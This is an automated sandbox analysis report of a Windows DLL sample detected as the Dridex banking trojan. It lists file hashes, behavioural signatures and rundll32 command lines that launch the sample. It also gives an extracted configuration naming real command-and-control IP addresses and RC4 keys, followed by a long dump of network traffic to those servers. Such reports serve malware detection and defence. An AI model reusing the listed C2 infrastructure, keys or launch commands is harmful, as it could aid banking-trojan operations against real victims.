Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.30568.30608

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.30568.30608 (renamed file extension from 30608 to dll)
Analysis ID:510688
MD5:968040cc79b202e81fab7ae4ccb311dd
SHA1:bc63b3f96eb0b71802904fe09c9df7ddc0173c27
SHA256:8cd503096b975fcfba8ef561945b66b33beaf674b64c3b7b724be9d6bc55ccdb
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5296 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2324 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4856 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5144 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1112 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6052 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.328754438.0000000002BD0000.00000040.00000010.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000003.00000003.328249768.0000000004DB0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000005.00000003.352634465.00000000034A0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000001.00000002.777092817.000000006E551000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000001.00000003.362955357.00000000010F0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.3.rundll32.exe.34bdb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              4.2.rundll32.exe.6e550000.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                1.3.loaddll32.exe.110db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  3.3.rundll32.exe.4dcdb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    4.3.rundll32.exe.2bedb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.3.loaddll32.exe.110db55.0.raw.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllReversingLabs: Detection: 15%
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49739 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000001.00000002.777371551.000000006E617000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.778184559.000000006E617000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.30568.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.7:49716 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.7:49724 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.7:49727 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
